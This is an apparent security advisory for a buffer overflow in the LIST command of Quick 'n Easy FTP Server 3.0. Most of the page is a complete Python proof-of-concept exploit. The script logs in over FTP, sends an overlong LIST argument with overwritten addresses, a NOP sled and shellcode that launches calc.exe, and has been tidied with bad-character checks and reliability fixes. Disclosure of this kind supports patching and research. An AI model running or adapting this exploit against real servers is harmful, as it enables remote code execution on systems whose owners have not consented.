"Quick 'n Easy FTP Server is a multi threaded FTP server for Windows 98/NT/XP that can be easily setup even by inexperienced users. New users can be easily created by a wizard which is guiding you step by step in the process."
A buffer overflow vulnerability exists in Quick 'n Easy FTP Server in its handling of the argument to the FTP LIST command. The proof of concept below logs in with a valid account, then sends an over-long LIST argument that overwrites control data with attacker-chosen addresses and redirects execution into supplied shellcode (here it launches calc.exe). The exploit's addresses are specific to the tested Windows 2000 SP0 (Polish) build and must be re-derived for other targets.
Credit:
The information has been provided by h07.
Vulnerable Systems:
* Quick 'n Easy FTP Server version 3.0 (the version named in the proof of concept; other versions were not tested)
Exploit (proof of concept; requires valid FTP credentials and target-build-specific addresses, see the comments in the script):
#!/usr/bin/python
#Quick 'n Easy FTP Server 3.0 (LIST) 0day PoC exploit
#Proof of Concept: execute calc.exe
#Tested on 2000 SP0 polish
#Bug found by h07
#Date: 18.07.2006
#
# NOTE(review): adr1, adr2 and the system() address embedded in the shellcode
# are for the exact Windows 2000 SP0 (Polish) build the author tested on and
# must be re-derived for any other target build.
from socket import *

# Target, and the FTP account the PoC logs in with before it sends LIST.
host, port = "127.0.0.1", 21
user, password = "h07", "open"

adr1 = 0x01ABED9A  # ~Address of shellcode (approximate; the NOP sled in front of the shellcode absorbs the slack)
adr2 = 0x7FFDF020  # RtlEnterCriticalSection pointer

# bad chars: 0x00 0x0a 0x0d 0x5c 0x2f  -- must not occur in the shellcode or in either address
_shellcode_parts = [
    # reconstruction of the PEB block:
    #   mov edx, 0x7FFDF020          ; EDX <-- RtlEnterCriticalSection pointer
    #   mov dword [edx], 0x77F8AA4C  ; RtlEnterCriticalSection pointer <-- original value
    "\xba\x20\xf0\xfd\x7f",
    "\xc7\x02\x4c\xaa\xf8\x77",
    # xor eax,eax / push eax / push "calc" / push esp / pop ebx / push eax /
    # push ebx / mov ecx, <system>      -> sets up system("calc")
    "\x33\xC0\x50\x68\x63\x61\x6C\x63\x54\x5B\x50\x53\xB9",
    "\xad\xaa\x01\x78",  # Address of system() function (2000 SP0 polish)
    "\xFF\xD1",          # call ecx
    "\xEB\xF7",          # jmp short -9: back to the mov ecx above, so the call repeats
]
shellcode = "".join(_shellcode_parts)
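def intel_order(i):
    """Return the low 32 bits of integer *i* as a 4-character little-endian string.

    Used to splice addresses into the payload in the byte order the x86 target
    reads them.  Only the low four bytes are emitted; higher bits and the sign
    are discarded (same result as ``struct.pack("<I", i & 0xFFFFFFFF)`` would
    give), and no bad-char filtering happens here -- the caller must check the
    returned bytes against the server's bad chars itself.
    """
    # Least significant byte first; masking each byte replaces the original
    # chained `% 256` / `>> 8` steps (and no longer shadows the builtin `str`).
    return "".join(chr((i >> shift) & 0xFF) for shift in (0, 8, 16, 24))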
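# Bytes the original author lists as unusable in the LIST argument.  The whole
# payload is checked against them before anything is sent: a single truncating
# byte inside an address silently turns the exploit into a plain crash.
bad_chars = "\x00\x0a\x0d\x5c\x2f"

payload = "".join([
    "LIST ",
    "?",                 # kept from the original trigger; its role is not documented here
    "A" * 267,           # together with the "?" that is 268 filler bytes up to the overwritten values
    intel_order(adr1),   # ECX <-- adr1 (address of shellcode)
    intel_order(adr2),   # EDX <-- adr2 (RtlEnterCriticalSection pointer)
    # Per the original notes the server then executes
    #   MOV DWORD PTR DS:[EDX],ECX   (rewrite RtlEnterCriticalSection pointer)
    #   MOV DWORD PTR DS:[ECX+4],EDX (exception and jump to shellcode)
    "\x90" * 300,        # NOP sled: adr1 only has to land somewhere inside it
    shellcode,
])
found = sorted(set(c for c in payload if c in bad_chars))
if found:
    raise ValueError("payload contains bad char(s): "
                     + ", ".join("0x%02x" % ord(c) for c in found))
payload += "\r\n"  # the line terminator is the one place 0x0d/0x0a belong

s = socket(AF_INET, SOCK_STREAM)
s.connect((host, port))
try:
    print(s.recv(1024))  # banner
    # sendall() instead of send(): send() may transmit only part of a buffer.
    s.sendall("user %s\r\n" % (user))
    print(s.recv(1024))
    s.sendall("pass %s\r\n" % (password))
    login_reply = s.recv(1024)
    print(login_reply)
    if not login_reply.startswith("230"):
        # 230 = "User logged in" (RFC 959).  Whether LIST is reachable without
        # a login is not stated anywhere on this page, so warn rather than abort
        # -- but a missing 230 is the first thing to check if nothing happens.
        print("WARNING: login not confirmed (no 230 reply); LIST may be rejected before the overflow")
    s.sendall(payload)
    print(s.recv(1024))
finally:
    # always release the socket, even if the server drops the connection mid-way
    s.close()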